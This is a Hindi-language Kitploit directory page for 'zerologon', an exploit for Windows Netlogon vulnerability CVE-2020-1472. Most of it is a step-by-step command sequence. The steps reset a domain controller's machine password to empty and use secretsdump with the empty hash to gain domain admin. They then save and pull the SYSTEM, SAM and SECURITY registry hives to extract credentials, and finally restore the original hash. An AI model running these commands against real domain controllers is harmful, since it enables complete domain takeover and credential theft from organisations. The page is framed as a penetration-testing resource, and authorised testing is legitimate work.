Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
zerologon — zerologon cve-2020-1472 के लिए शोषण | Kitploit
उपकरण/GitHubGitHub/risksense/zerologon
विशेषाधिकार वृद्धिपासवर्ड हमलेभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंग
GitHubrisksense/zerologon

zerologon

zerologon cve-2020-1472 के लिए शोषण

रिपॉजिटरी देखें
7041465 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ZeroLogon शोषण स्क्रिप्ट

शोषण कोड https://www.secura.com/blog/zero-logon और https://github.com/SecuraBV/CVE-2020-1472 पर आधारित है। मूल शोध और स्कैनर Secura द्वारा, संशोधन RiskSense Inc. द्वारा।

शोषण करने के लिए, आपके पास मौजूद किसी भी पिछले Impacket इंस्टॉलेशन को हटा दें और https://github.com/SecureAuthCorp/impacket/commit/b867b21 या उससे नए से Impacket इंस्टॉल करें। फिर, करें:

root@kitploit:~
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR

यदि यह सफल होता है तो आप तब सक्षम होंगे:

root@kitploit:~
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'

जो आपको डोमेन एडमिन प्राप्त करना चाहिए। उसके बाद, secretsdump से एक क्रेडेंशियल के साथ लक्ष्य DC पर wmiexec.py का उपयोग करें और करें

root@kitploit:~
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save

फिर आप कर सकते हैं:

root@kitploit:~
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

और यह आपको मशीन खाते का मूल NT हैश दिखाना चाहिए। फिर आप उस मूल मशीन खाता हैश को डोमेन में पुनः स्थापित कर सकते हैं:

root@kitploit:~
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH

DC के सामान्य रूप से संचालन जारी रखने के लिए मूल हैश को पुनः स्थापित करना आवश्यक है।

टूल डाउनलोड करें